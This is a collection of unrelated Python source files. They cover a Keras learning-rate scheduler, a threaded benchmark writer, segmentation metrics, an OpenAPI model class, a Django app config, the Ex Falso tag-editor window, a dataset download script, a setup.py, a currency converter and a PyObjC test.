        cycle = np.floor(1 + self.clr_iterations / (2 * self.step_size))
        x = np.abs(self.clr_iterations / self.step_size - 2 * cycle + 1)
        if self.scale_mode == 'cycle':
            return self.base_lr + (self.max_lr - self.base_lr) * np.maximum(0, (1 - x)) * self.scale_fn(cycle)
        else:
            return self.base_lr + (self.max_lr - self.base_lr) * np.maximum(0, (1 - x)) * self.scale_fn(self.clr_iterations)

    def on_train_begin(self, logs={}):
        logs = logs or {}
        if self.clr_iterations == 0:
            # FIX: print-as-function works in both Python 2 and 3; the
            # original print statement was a SyntaxError under Python 3.
            print('learning rate : {}'.format(self.base_lr))
            K.set_value(self.model.optimizer.lr, self.base_lr)
        else:
            K.set_value(self.model.optimizer.lr, self.clr())

    def on_batch_end(self, epoch, logs=None):
        logs = logs or {}
        self.trn_iterations += 1
        self.clr_iterations += 1
        K.set_value(self.model.optimizer.lr, self.clr())
        self.history.setdefault('lr', []).append(K.get_value(self.model.optimizer.lr))
        self.history.setdefault('iterations', []).append(self.trn_iterations)
        for k, v in logs.items():
            self.history.setdefault(k, []).append(v)
def captureOptimizerLR(nn):
    """Return the current learning rate of *nn*'s optimizer via the backend."""
    return K.get_value(nn.optimizer.lr)
if __name__ == '__main__':
    # Quick visual sanity check of the time-based decay schedule.
    trainingEpochs = 300
    lr = 0.001
    temp = []
    # FIX: xrange and the print statement are Python-2 only (errors on
    # Python 3); range and print() behave identically on both.
    for epoch in range(1, trainingEpochs):
        decay = lr * (float(epoch) / trainingEpochs)
        lr = lr * 1 / (1 + decay * epoch)
        print(lr)
        temp.append(lr)

    from pylab import *
    plot(temp)
    xlabel('time')
    ylabel('learning rate')
    title('Learning rate decay')
    grid(True)
    show()
|
from zerocon import IOException
from benchutils import getInterface, getSeries
from threading import Thread
import time, Queue
class Emitter(Thread):
    """Producer thread: pushes the current timestamp onto *queue* once per second.

    Runs forever; shutdown is left to process exit.
    """

    def __init__(self, queue):
        super(Emitter, self).__init__()
        self.queue = queue

    def run(self):
        while True:
            time.sleep(1)
            self.queue.put(time.time())
class TestThread(Thread):
    # Worker thread: for every timestamp produced by its Emitter, appends one
    # record to a series through the benchmark interface, reconnecting and
    # retrying on IOException.  (Python 2 code: uses the old Queue module.)
    def __init__(self, x):
        Thread.__init__(self)
        self.x = x  # worker index; also used as the output file name
        self.ifc = getInterface()
        self.sd, self.head = getSeries(self.ifc, 'x'+str(x))
        self.collector = Queue.Queue()

    def run(self):
        Emitter(self.collector).start()
        head = self.head
        while True:
            issued_on = self.collector.get(True)  # block until the next tick
            started_on = time.time()
            # Retry the write until it succeeds, reopening on I/O failure.
            while True:
                try:
                    self.ifc.writeSeries(self.sd, head, head+1, ' ')
                except IOException:
                    self.ifc.close()
                    self.ifc = getInterface()
                else:
                    break
            stopped_on = time.time()
            # NOTE(review): writes to the filesystem root ('/<x>') —
            # presumably meant to be a results directory; confirm the path.
            with open('/%s' % (self.x, ), 'a') as f:
                f.write('%s %s %s\n' % (issued_on, started_on, stopped_on))
            head += 1
        self.ifc.close()  # unreachable: the loop above never exits
# Spawn ten writer threads, then block on stdin so they keep running until
# the user presses Enter.  (Python 2 code: xrange / raw_input.)
threads = [TestThread(x) for x in xrange(0, 10)]
[thread.start() for thread in threads]
raw_input()
|
# import numpy as np
# import torch
# from medpy import metric
# from scipy.ndimage import zoom
# import torch.nn as nn
# import cv2
# import SimpleITK as sitk
#
# import matplotlib.pyplot as plt
# import tensorflow as tf
# import matplotlib.pylab as pl
# from matplotlib.colors import ListedColormap
#
#
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# class DiceLoss(nn.Module):
# def __init__(self, n_classes):
# super(DiceLoss, self).__init__()
# self.n_classes = n_classes
#
# def _one_hot_encoder(self, input_tensor):
# tensor_list = []
# for i in range(self.n_classes):
# temp_prob = input_tensor == i # * torch.ones_like(input_tensor)
# tensor_list.append(temp_prob.unsqueeze(1))
# output_tensor = torch.cat(tensor_list, dim=1)
# return output_tensor.float()
#
# def _dice_loss(self, score, target):
# target = target.float()
# smooth = 1e-5
# intersect = torch.sum(score * target)
# y_sum = torch.sum(target * target)
# z_sum = torch.sum(score * score)
# loss = (2 * intersect + smooth) / (z_sum + y_sum + smooth)
# loss = 1 - loss
# return loss
#
# def forward(self, inputs, target, weight=None, softmax=False):
# if softmax:
# inputs = torch.softmax(inputs, dim=1)
# # own
# #target = self._one_hot_encoder(target)
# target=target[:,:,:,0]+target[:,:,:,1]+target[:,:,:,2]
# inputs=inputs[:,0,:,:,]+inputs[:,1,:,:,]
# if weight is None:
# weight = [1] * self.n_classes
# assert inputs.size() == target.size(), 'predict {} & target {} shape do not match'.format(inputs.size(), target.size())
# class_wise_dice = []
# loss = 0.0
# for i in range(0, self.n_classes):
# dice = self._dice_loss(inputs[:, i], target[:, i])
# class_wise_dice.append(1.0 - dice.item())
# loss += dice * weight[i]
# return loss / self.n_classes
#
#
# def calculate_metric_percase(pred, gt):
# pred[pred > 0] = 1
# gt[gt > 0] = 1
# if pred.sum() > 0 and gt.sum()>0:
# dice = metric.binary.dc(pred, gt)
# hd95 = metric.binary.hd95(pred, gt)
# return dice, hd95
# elif pred.sum() > 0 and gt.sum()==0:
# return 1, 0
# else:
# return 0, 0
#
#
# def test_single_volume(image, label, net, classes, patch_size=[256, 256], test_save_path=None, case=None, z_spacing=1):
# image, label = image.squeeze(0).cpu().detach().numpy(), label.squeeze(0).cpu().detach().numpy()
# if len(image.shape) == 3:
# prediction = np.zeros_like(label)
# for ind in range(image.shape[0]):
# slice = image[ind, :, :]
# x, y = slice.shape[0], slice.shape[1]
# if x != patch_size[0] or y != patch_size[1]:
# slice = zoom(slice, (patch_size[0] / x, patch_size[1] / y), order=3) # previous using 0
# # our
# input = torch.from_numpy(slice).unsqueeze(0).float().to(device)
# # origin
# # input = torch.from_numpy(slice).unsqueeze(0).unsqueeze(0).float().to(device)
# net.eval()
# with torch.no_grad():
# outputs = net(input)
# # our
# out = torch.argmax(torch.sigmoid(outputs), dim=1).squeeze(0)
# # origin
# #out = torch.argmax(torch.softmax(outputs, dim=1), dim=1).squeeze(0)
# out = out.cpu().detach().numpy()
# if x != patch_size[0] or y != patch_size[1]:
# pred = zoom(out, (x / patch_size[0], y / patch_size[1]), order=0)
# else:
# pred = out
# prediction[ind] = pred
# prediction=prediction[0]
# else:
# # our1
# #input = torch.from_numpy(image).unsqueeze(0).float().to(device)
# # our2
# input=torch.from_numpy(image).unsqueeze(0).unsqueeze(0).float().to(device)
# # origin
# #input = torch.from_numpy(image).unsqueeze(0).unsqueeze(0).float().to(device)
#
# net.eval()
# with torch.no_grad():
# out = torch.argmax(torch.softmax(net(input), dim=1), dim=1).squeeze(0)
# prediction = out.cpu().detach().numpy()
# metric_list = []
# print("jj")
# for i in range(1, classes):
# metric_list.append(calculate_metric_percase(prediction == i, label == i))
# # origin
# # if test_save_path is not None:
# # img_itk = sitk.GetImageFromArray(image.astype(np.float32))
# # prd_itk = sitk.GetImageFromArray(prediction.astype(np.float32))
# # lab_itk = sitk.GetImageFromArray(label.astype(np.float32))
# # img_itk.SetSpacing((1, 1, z_spacing))
# # prd_itk.SetSpacing((1, 1, z_spacing))
# # lab_itk.SetSpacing((1, 1, z_spacing))
# # sitk.WriteImage(prd_itk, test_save_path + '/'+case + "_pred.nii.gz")
# # sitk.WriteImage(img_itk, test_save_path + '/'+ case + "_img.nii.gz")
# # sitk.WriteImage(lab_itk, test_save_path + '/'+ case + "_gt.nii.gz")
# # our
# if test_save_path is not None:
# cv2.imwrite(test_save_path + "/" +case +".png",prediction*255)
# return metric_list
#
# def visualize(X, y, y_pred, sample_num, figsize=(10, 10), cmap='viridis'):
# y_pred_np = y_pred[sample_num, :, :, :]
# y_class = np.argmax(y_pred_np, axis=-1)
# x = X.numpy()[sample_num, :, :, :]
# y_np = y.numpy()[sample_num, :, :, :]
# y_np = np.argmax(y_np, axis=-1)
# fig, axis = plt.subplots(1, 2, figsize=figsize)
# axis[0].imshow(x, cmap='gray')
# axis[0].imshow(y_np, cmap=cmap, alpha=0.3)
# axis[0].set_title("original labels")
# axis[1].imshow(x, cmap='gray')
# axis[1].imshow(y_class, cmap=cmap, alpha=0.3)
# axis[1].set_title("predicted labels")
# plt.show()
#
#
# def visualize_non_empty_predictions(X, y, models, figsize=(10, 10), cmap=pl.cm.tab10_r, alpha=0.8, titles=[]):
# x = X.numpy()
# y_np = y.numpy()
# y_np = np.argmax(y_np, axis=-1)
# labels = np.unique(y_np)
# if len(labels) != 1:
# # create cmap
# my_cmap = cmap(np.arange(cmap.N))
# my_cmap[:, -1] = 0.9
# my_cmap[0, -1] = 0.1
# my_cmap = ListedColormap(my_cmap)
#
# n_plots = len(models) + 1
# fig, axis = plt.subplots(1, n_plots, figsize=figsize)
#
# axis[0].imshow(x, cmap='gray')
# axis[0].imshow(y_np, cmap=my_cmap, alpha=alpha)
# axis[0].set_title("original labels")
# axis[0].set_xticks([])
# axis[0].set_yticks([])
#
# for i, model in enumerate(models):
# y_pred = model.model.predict(tf.expand_dims(X, axis=0))
# y_class = np.argmax(y_pred, axis=-1)
# axis[i+1].imshow(x, cmap='gray')
# axis[i+1].imshow(y_class[0], cmap=my_cmap, alpha=alpha)
# if titles == []:
# axis[i+1].set_title(f"{model.name}")
# else:
# axis[i+1].set_title(f"{titles[i]}")
# axis[i+1].set_xticks([])
# axis[i+1].set_yticks([])
#
# plt.show()
import numpy as np
import torch
from medpy import metric
from scipy.ndimage import zoom
import torch.nn as nn
import SimpleITK as sitk
import cv2
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class DiceLoss(nn.Module):
    """Multi-class soft Dice loss.

    The integer target is one-hot encoded to match the prediction's channel
    layout; per-class Dice losses are averaged (optionally weighted).
    """

    def __init__(self, n_classes):
        super(DiceLoss, self).__init__()
        self.n_classes = n_classes

    def _one_hot_encoder(self, input_tensor):
        # Stack one boolean mask per class along a new channel dimension.
        channels = [(input_tensor == i).unsqueeze(1)
                    for i in range(self.n_classes)]
        return torch.cat(channels, dim=1).float()

    def _dice_loss(self, score, target):
        target = target.float()
        smooth = 1e-5
        overlap = torch.sum(score * target)
        denom = torch.sum(score * score) + torch.sum(target * target)
        return 1 - (2 * overlap + smooth) / (denom + smooth)

    def forward(self, inputs, target, weight=None, softmax=False):
        if softmax:
            inputs = torch.softmax(inputs, dim=1)
        target = self._one_hot_encoder(target)
        if weight is None:
            weight = [1] * self.n_classes
        assert inputs.size() == target.size(), 'predict {} & target {} shape do not match'.format(inputs.size(), target.size())
        class_wise_dice = []
        loss = 0.0
        for i in range(self.n_classes):
            dice = self._dice_loss(inputs[:, i], target[:, i])
            class_wise_dice.append(1.0 - dice.item())
            loss = loss + dice * weight[i]
        return loss / self.n_classes
def calculate_metric_percase(pred, gt):
    """Binarize *pred*/*gt* in place and return (Dice, 95% Hausdorff distance).

    Returns (1, 0) when a prediction exists but the ground truth is empty,
    and (0, 0) when the prediction is empty.
    """
    pred[pred > 0] = 1  # NOTE: mutates the caller's arrays in place
    gt[gt > 0] = 1
    if pred.sum() > 0 and gt.sum()>0:
        # our
        # NOTE(review): keeps only channel 1 of gt — presumably the ground
        # truth is multi-channel while pred is 2-D here; confirm against the
        # caller's label layout before relying on this.
        gt=gt[:,:,1]
        dice = metric.binary.dc(pred, gt)
        hd95 = metric.binary.hd95(pred, gt)
        return dice, hd95
    elif pred.sum() > 0 and gt.sum()==0:
        return 1, 0
    else:
        return 0, 0
def test_single_volume(image, label, net, classes, patch_size=[256, 256], test_save_path=None, case=None, z_spacing=1):
    """Run slice-wise inference over a volume and score every foreground class.

    Returns a list of (dice, hd95) tuples, one per class in
    ``range(1, classes)``.  Optionally writes the prediction as a PNG.

    NOTE(review): the mutable default ``patch_size=[256, 256]`` is never
    mutated here, but a tuple default would be safer.
    """
    image, label = image.squeeze(0).cpu().detach().numpy(), label.squeeze(0).cpu().detach().numpy()
    if len(image.shape) == 3:
        # 3-D input: predict slice by slice along axis 0.
        prediction = np.zeros_like(image)
        for ind in range(image.shape[0]):
            slice = image[ind, :, :]
            x, y = slice.shape[0], slice.shape[1]
            if x != patch_size[0] or y != patch_size[1]:
                # Resize to the network input size (cubic interpolation).
                slice = zoom(slice, (patch_size[0] / x, patch_size[1] / y), order=3)  # previous using 0
            input = torch.from_numpy(slice).unsqueeze(0).unsqueeze(0).float().to(device)
            net.eval()
            with torch.no_grad():
                outputs = net(input)
                # out = torch.argmax(torch.softmax(outputs, dim=1), dim=1).squeeze(0)
                # sigmoid+argmax variant used in this fork instead of softmax.
                out = torch.argmax(torch.sigmoid(outputs), dim=1).squeeze(0)
                out = out.cpu().detach().numpy()
                if x != patch_size[0] or y != patch_size[1]:
                    # Nearest-neighbour resize back to the original slice size.
                    pred = zoom(out, (x / patch_size[0], y / patch_size[1]), order=0)
                else:
                    pred = out
                prediction[ind] = pred
        # NOTE(review): only slice 0 of the assembled volume is kept —
        # presumably this fork evaluates a single 2-D slice; confirm intent.
        prediction = prediction[0]
    else:
        # 2-D input: a single forward pass with softmax+argmax.
        input = torch.from_numpy(image).unsqueeze(
            0).unsqueeze(0).float().to(device)
        net.eval()
        with torch.no_grad():
            out = torch.argmax(torch.softmax(net(input), dim=1), dim=1).squeeze(0)
            prediction = out.cpu().detach().numpy()
    metric_list = []
    for i in range(1, classes):
        metric_list.append(calculate_metric_percase(prediction == i, label == i))
    # Original ITK-based volume export kept for reference:
    # if test_save_path is not None:
    #     img_itk = sitk.GetImageFromArray(image.astype(np.float32))
    #     prd_itk = sitk.GetImageFromArray(prediction.astype(np.float32))
    #     lab_itk = sitk.GetImageFromArray(label.astype(np.float32))
    #     img_itk.SetSpacing((1, 1, z_spacing))
    #     prd_itk.SetSpacing((1, 1, z_spacing))
    #     lab_itk.SetSpacing((1, 1, z_spacing))
    #     sitk.WriteImage(prd_itk, test_save_path + '/'+case + "_pred.nii.gz")
    #     sitk.WriteImage(img_itk, test_save_path + '/'+ case + "_img.nii.gz")
    #     sitk.WriteImage(lab_itk, test_save_path + '/'+ case + "_gt.nii.gz")
    if test_save_path is not None:
        print(test_save_path + '/'+case + '.png')
        cv2.imwrite(test_save_path + '/'+case + '.png', prediction*255)
    return metric_list
|
# coding: utf-8
"""
Neucore API
Client library of Neucore API # noqa: E501
The version of the OpenAPI document: 1.14.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from neucore_api.configuration import Configuration
class GroupApplication(object):
    """Model of a player's application to join a group.

    NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.

    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """

    # attribute name -> declared OpenAPI type
    openapi_types = {
        'id': 'int',
        'player': 'Player',
        'group': 'Group',
        'created': 'datetime',
        'status': 'str',
    }

    # attribute name -> JSON key in the API definition
    attribute_map = {
        'id': 'id',
        'player': 'player',
        'group': 'group',
        'created': 'created',
        'status': 'status',
    }

    def __init__(self, id=None, player=None, group=None, created=None, status=None, local_vars_configuration=None):  # noqa: E501
        """GroupApplication - a model defined in OpenAPI"""  # noqa: E501
        self.local_vars_configuration = (
            Configuration()
            if local_vars_configuration is None
            else local_vars_configuration
        )

        # Backing fields for the properties below.
        self._id = None
        self._player = None
        self._group = None
        self._created = None
        self._status = None
        self.discriminator = None

        # Required members go through their validating setters.
        self.id = id
        self.player = player
        self.group = group
        self.created = created
        # `status` is optional; only assign when a value was supplied.
        if status is not None:
            self.status = status

    @property
    def id(self):
        """int: The id of this GroupApplication."""
        return self._id

    @id.setter
    def id(self, id):
        """Set the id; rejects None when client-side validation is on."""
        if self.local_vars_configuration.client_side_validation and id is None:  # noqa: E501
            raise ValueError("Invalid value for `id`, must not be `None`")  # noqa: E501
        self._id = id

    @property
    def player(self):
        """Player: The player of this GroupApplication."""
        return self._player

    @player.setter
    def player(self, player):
        """Set the player; rejects None when client-side validation is on."""
        if self.local_vars_configuration.client_side_validation and player is None:  # noqa: E501
            raise ValueError("Invalid value for `player`, must not be `None`")  # noqa: E501
        self._player = player

    @property
    def group(self):
        """Group: The group of this GroupApplication."""
        return self._group

    @group.setter
    def group(self, group):
        """Set the group; rejects None when client-side validation is on."""
        if self.local_vars_configuration.client_side_validation and group is None:  # noqa: E501
            raise ValueError("Invalid value for `group`, must not be `None`")  # noqa: E501
        self._group = group

    @property
    def created(self):
        """datetime: The created timestamp of this GroupApplication."""
        return self._created

    @created.setter
    def created(self, created):
        """Set the created timestamp (no validation; may be None)."""
        self._created = created

    @property
    def status(self):
        """str: Group application status."""
        return self._status

    @status.setter
    def status(self, status):
        """Set the group application status (pending/accepted/denied)."""
        allowed_values = ["pending", "accepted", "denied"]  # noqa: E501
        if self.local_vars_configuration.client_side_validation and status not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `status` ({0}), must be one of {1}"  # noqa: E501
                .format(status, allowed_values)
            )
        self._status = status

    def to_dict(self):
        """Returns the model properties as a dict"""
        def _convert(value):
            # Shallow conversion: one level of list/dict, delegating to
            # nested models' own to_dict() where available.
            if isinstance(value, list):
                return [v.to_dict() if hasattr(v, "to_dict") else v
                        for v in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {k: v.to_dict() if hasattr(v, "to_dict") else v
                        for k, v in value.items()}
            return value

        return {attr: _convert(getattr(self, attr))
                for attr in self.openapi_types}

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return (isinstance(other, GroupApplication)
                and self.to_dict() == other.to_dict())

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return (not isinstance(other, GroupApplication)
                or self.to_dict() != other.to_dict())
|
from django.apps import AppConfig
class RouterConfig(AppConfig):
    """Django application configuration for the `my_router` app."""

    # Use 64-bit auto primary keys for models in this app.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'my_router'

    def ready(self):
        """Called once Django has loaded all apps."""
        # Import the receivers module for its side effect of registering
        # signal handlers; the name itself is unused.
        import my_router.receivers  # noqa
|
# -*- coding: utf-8 -*-
# Copyright 2004-2005 Joe Wreschnig, Michael Urman, Iñigo Serna
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation
import os
from gi.repository import Gtk, GObject, Pango
from quodlibet.qltk.msg import confirm_action
from quodlibet import config
from quodlibet import const
from quodlibet import formats
from quodlibet import qltk
from quodlibet import util
from quodlibet.plugins import PluginManager
from quodlibet.qltk.ccb import ConfigCheckButton
from quodlibet.qltk.delete import trash_files, TrashMenuItem
from quodlibet.qltk.edittags import EditTags
from quodlibet.qltk.filesel import MainFileSelector, FileSelector
from quodlibet.qltk.pluginwin import PluginWindow
from quodlibet.qltk.renamefiles import RenameFiles
from quodlibet.qltk.tagsfrompath import TagsFromPath
from quodlibet.qltk.tracknumbers import TrackNumbers
from quodlibet.qltk.entry import UndoEntry
from quodlibet.qltk.about import AboutExFalso
from quodlibet.qltk.songsmenu import SongsMenuPluginHandler
from quodlibet.qltk.x import Alignment, SeparatorMenuItem, ConfigRHPaned
from quodlibet.qltk.window import PersistentWindowMixin, Window
from quodlibet.util.path import mtime, normalize_path
class ExFalsoWindow(Window, PersistentWindowMixin):
    """Main Ex Falso window: a file selector pane on the left and a
    notebook of tag-editing tools (edit tags, tags from path, rename,
    track numbers) on the right.

    Signals:
        changed: emitted with the list of songs currently selected.
        artwork-changed: emitted with songs whose artwork was modified.
    """

    __gsignals__ = {
        'changed': (GObject.SignalFlags.RUN_LAST,
                    None, (object,)),
        'artwork-changed': (GObject.SignalFlags.RUN_LAST,
                            None, (object,))
    }

    # Shared handler for per-song plugin menu entries.
    pm = SongsMenuPluginHandler(confirm_action)

    @classmethod
    def init_plugins(cls):
        """Register the songs-menu plugin handler with the plugin manager."""
        PluginManager.instance.register_handler(cls.pm)

    def __init__(self, library, dir=None):
        # dir: optional directory for the file selector to open initially.
        super(ExFalsoWindow, self).__init__(dialog=False)
        self.set_title("Ex Falso")
        self.set_default_size(750, 475)
        self.enable_window_tracking("exfalso")

        self.__library = library

        # Horizontal paned container: file selector left, tools right.
        hp = ConfigRHPaned("memory", "exfalso_paned_position", 1.0)
        hp.set_border_width(0)
        hp.set_position(250)
        hp.show()
        self.add(hp)

        vb = Gtk.VBox()

        # Bottom button row: about, preferences, plugins, selection label.
        bbox = Gtk.HBox(spacing=6)
        about = Gtk.Button()
        about.add(Gtk.Image.new_from_stock(
            Gtk.STOCK_ABOUT, Gtk.IconSize.BUTTON))
        about.connect_object('clicked', self.__show_about, self)
        bbox.pack_start(about, False, True, 0)
        prefs = Gtk.Button()
        prefs.add(Gtk.Image.new_from_stock(
            Gtk.STOCK_PREFERENCES, Gtk.IconSize.BUTTON))

        def prefs_cb(button):
            window = PreferencesWindow(self)
            window.show()
        prefs.connect('clicked', prefs_cb)
        bbox.pack_start(prefs, False, True, 0)
        plugins = qltk.Button(_("_Plugins"), Gtk.STOCK_EXECUTE)

        def plugin_window_cb(button):
            window = PluginWindow(self)
            window.show()
        plugins.connect('clicked', plugin_window_cb)
        bbox.pack_start(plugins, False, True, 0)

        # Right-aligned, ellipsized label showing the selection count.
        l = Gtk.Label()
        l.set_alignment(1.0, 0.5)
        l.set_ellipsize(Pango.EllipsizeMode.END)
        bbox.pack_start(l, True, True, 0)

        fs = MainFileSelector()

        vb.pack_start(fs, True, True, 0)
        vb.pack_start(Alignment(bbox, border=6), False, True, 0)
        vb.show_all()

        hp.pack1(vb, resize=True, shrink=False)

        # Notebook holding one page per tag-editing tool.
        nb = qltk.Notebook()
        nb.props.scrollable = True
        nb.show()
        for Page in [EditTags, TagsFromPath, RenameFiles, TrackNumbers]:
            page = Page(self, self.__library)
            page.show()
            nb.append_page(page)
        align = Alignment(nb, top=3)
        align.show()
        hp.pack2(align, resize=True, shrink=False)

        fs.connect('changed', self.__changed, l)
        if dir:
            fs.go_to(dir)

        # Rescan the selector whenever the library reports changes; the
        # handler is disconnected when this window is destroyed.
        s = self.__library.connect('changed', lambda *x: fs.rescan())
        self.connect_object('destroy', self.__library.disconnect, s)

        # __save holds the pending "save" button of the active tool page,
        # or None when there are no unsaved edits.
        self.__save = None
        self.connect_object('changed', self.set_pending, None)

        # Intercept selection changes so unsaved edits can be confirmed.
        for c in fs.get_children():
            c.get_child().connect('button-press-event',
                                  self.__pre_selection_changed, fs, nb)
            c.get_child().connect('focus',
                                  self.__pre_selection_changed, fs, nb)
        fs.get_children()[1].get_child().connect('popup-menu',
                                                 self.__popup_menu, fs)

        self.emit('changed', [])

        self.get_child().show()

        # Ctrl+Q closes the window.
        self.__ag = Gtk.AccelGroup()
        key, mod = Gtk.accelerator_parse("<control>Q")
        self.__ag.connect(key, mod, 0, lambda *x: self.destroy())
        self.add_accel_group(self.__ag)

    def __show_about(self, window):
        """Run the modal About dialog."""
        about = AboutExFalso(self)
        about.run()
        about.destroy()

    def set_pending(self, button, *excess):
        """Remember the tool page's save button with unsaved edits
        (or clear it when `button` is None)."""
        self.__save = button

    def __pre_selection_changed(self, view, event, fs, nb):
        """Before the selection changes, offer to save pending edits.

        Returns True (cancels the event) when the user chose Cancel or
        closed the dialog.
        """
        if self.__save:
            resp = qltk.CancelRevertSave(self).run()
            if resp == Gtk.ResponseType.YES:
                self.__save.clicked()
            elif resp == Gtk.ResponseType.NO:
                fs.rescan()
            else:
                nb.grab_focus()
                return True  # cancel or closed

    def __popup_menu(self, view, fs):
        """Build and show the context menu for the selected files."""
        # get all songs for the selection
        filenames = [normalize_path(f, canonicalise=True)
                     for f in fs.get_selected_paths()]
        maybe_songs = [self.__library.get(f) for f in filenames]
        songs = [s for s in maybe_songs if s]

        if songs:
            menu = self.pm.Menu(self.__library, self, songs)
            if menu is None:
                menu = Gtk.Menu()
            else:
                menu.prepend(SeparatorMenuItem())
        else:
            menu = Gtk.Menu()

        b = TrashMenuItem()
        b.connect('activate', self.__delete, filenames, fs)
        menu.prepend(b)

        menu.connect_object('selection-done', Gtk.Menu.destroy, menu)
        menu.show_all()
        return view.popup_menu(menu, 0, Gtk.get_current_event_time())

    def __delete(self, item, paths, fs):
        """Move the given paths to the trash, then refresh the selector."""
        trash_files(self, paths)
        fs.rescan()

    def __changed(self, selector, selection, label):
        """Selection-changed handler: update the count label, reload stale
        songs, add new files to the library and re-emit 'changed'."""
        model, rows = selection.get_selected_rows()
        files = []

        if len(rows) < 2:
            count = len(model or [])
        else:
            count = len(rows)
        label.set_text(ngettext("%d song", "%d songs", count) % count)

        for row in rows:
            filename = model[row][0]
            if not os.path.exists(filename):
                pass
            elif filename in self.__library:
                file = self.__library[filename]
                # Reload when the on-disk file is newer than our copy
                # (+1s slack for filesystem timestamp granularity).
                if file("~#mtime") + 1. < mtime(filename):
                    try:
                        file.reload()
                    # NOTE(review): StandardError implies this module targets
                    # Python 2 — confirm before porting.
                    except StandardError:
                        pass
                files.append(file)
            else:
                files.append(formats.MusicFile(filename))
        files = filter(None, files)

        if len(files) == 0:
            self.set_title("Ex Falso")
        elif len(files) == 1:
            self.set_title("%s - Ex Falso" % files[0].comma("title"))
        else:
            self.set_title(
                "%s - Ex Falso" %
                (ngettext("%(title)s and %(count)d more",
                          "%(title)s and %(count)d more",
                          len(files) - 1) % (
                    {'title': files[0].comma("title"), 'count': len(files) - 1})))
        self.__library.add(files)
        self.emit('changed', files)
class PreferencesWindow(qltk.UniqueWindow):
    """Ex Falso preferences dialog (tag-editing options).

    Only one instance exists at a time (qltk.UniqueWindow); the config
    is written to disk when the window is destroyed.
    """

    def __init__(self, parent):
        # UniqueWindow: bail out if an instance is already showing.
        if self.is_not_unique():
            return
        super(PreferencesWindow, self).__init__()
        self.set_title(_("Ex Falso Preferences"))
        self.set_border_width(12)
        self.set_resizable(False)
        self.set_transient_for(parent)

        vbox = Gtk.VBox(spacing=6)
        hb = Gtk.HBox(spacing=6)

        # Entry for the tag-value split characters; saved on every change.
        e = UndoEntry()
        e.set_text(config.get("editing", "split_on"))
        e.connect('changed', self.__changed, 'editing', 'split_on')
        l = Gtk.Label(label=_("Split _on:"))
        l.set_use_underline(True)
        l.set_mnemonic_widget(e)
        hb.pack_start(l, False, True, 0)
        hb.pack_start(e, True, True, 0)

        # Toggle that persists directly into config ("editing"/"alltags").
        cb = ConfigCheckButton(
            _("Show _programmatic tags"), 'editing', 'alltags',
            tooltip=_("Access all tags, including machine-generated "
                      "ones e.g. MusicBrainz or Replay Gain tags"))
        cb.set_active(config.getboolean("editing", 'alltags'))
        vbox.pack_start(hb, False, True, 0)
        vbox.pack_start(cb, False, True, 0)
        f = qltk.Frame(_("Tag Editing"), child=vbox)

        close = Gtk.Button(stock=Gtk.STOCK_CLOSE)
        close.connect_object('clicked', lambda x: x.destroy(), self)
        button_box = Gtk.HButtonBox()
        button_box.set_layout(Gtk.ButtonBoxStyle.END)
        button_box.pack_start(close, True, True, 0)

        main_vbox = Gtk.VBox(spacing=12)
        main_vbox.pack_start(f, True, True, 0)
        main_vbox.pack_start(button_box, False, True, 0)
        self.add(main_vbox)

        self.connect_object('destroy', PreferencesWindow.__destroy, self)

        self.get_child().show_all()

    def __changed(self, entry, section, name):
        """Persist an entry's text into the given config section/key."""
        config.set(section, name, entry.get_text())

    def __destroy(self):
        # Flush the in-memory config to the config file on close.
        config.write(const.CONFIG)
|
import os

# Fetch the gender dataset archive and unpack it into ./data.
# Create the target directory without shelling out; tolerate re-runs.
os.makedirs("data", exist_ok=True)
# The original command passed "data/" as a trailing wget argument, which
# wget interprets as a second URL (an error), not a destination directory.
# Download into the working directory and extract into data/ instead.
os.system("wget https://www.dropbox.com/s/zcwlujrtz3izcw8/gender.tgz")
os.system("tar xvzf gender.tgz -C data/")
os.system("rm gender.tgz")
|
from setuptools import setup, find_packages

PROJECT_URL = 'https://github.com/pfalcon/sphinx_selective_exclude'
VERSION = '1.0.3'

# Read the long description up front so the file handle is closed promptly
# (the original left open("README.md") unclosed).
with open("README.md") as f:
    LONG_DESCRIPTION = f.read()

setup(
    name='sphinx_selective_exclude',
    version=VERSION,
    url=PROJECT_URL,
    download_url=PROJECT_URL + '/tarball/' + VERSION,
    license='MIT license',
    author='Paul Sokolovsky',
    author_email='pfalcon@users.sourceforge.net',
    description='Sphinx eager ".. only::" directive and other selective rendition extensions',
    long_description=LONG_DESCRIPTION,
    long_description_content_type="text/markdown",
    zip_safe=False,
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Documentation',
        'Topic :: Utilities',
    ],
    platforms='any',
    packages=find_packages(),
    include_package_data=True,
    # An empty list is the idiomatic "no runtime dependencies" (was None).
    install_requires=[],
    namespace_packages=[],
    keywords=['sphinx', 'only', 'plugin'],
)
|
# Read how much money the user has in their wallet and show how many
# dollars they could buy, assuming US$1.00 = R$5.58.
COTACAO = 5.58  # exchange rate: BRL per USD (hard-coded snapshot)

# Prompt typo fixed: 'Quando' (when) -> 'Quanto' (how much).
real = float(input('Quanto dinheiro você tem na carteira? '))
dolar = real / COTACAO
print('Com R${:.2f} você pode comprar US${:.2f}'.format(real, dolar))
|
import AppKit
from PyObjCTools.TestSupport import TestCase
class TestNSInterfaceStyle(TestCase):
    """Checks the AppKit NSInterfaceStyle constants and lookup function."""

    def testConstants(self):
        # The interface style constants are fixed numeric values.
        self.assertEqual(AppKit.NSNoInterfaceStyle, 0)
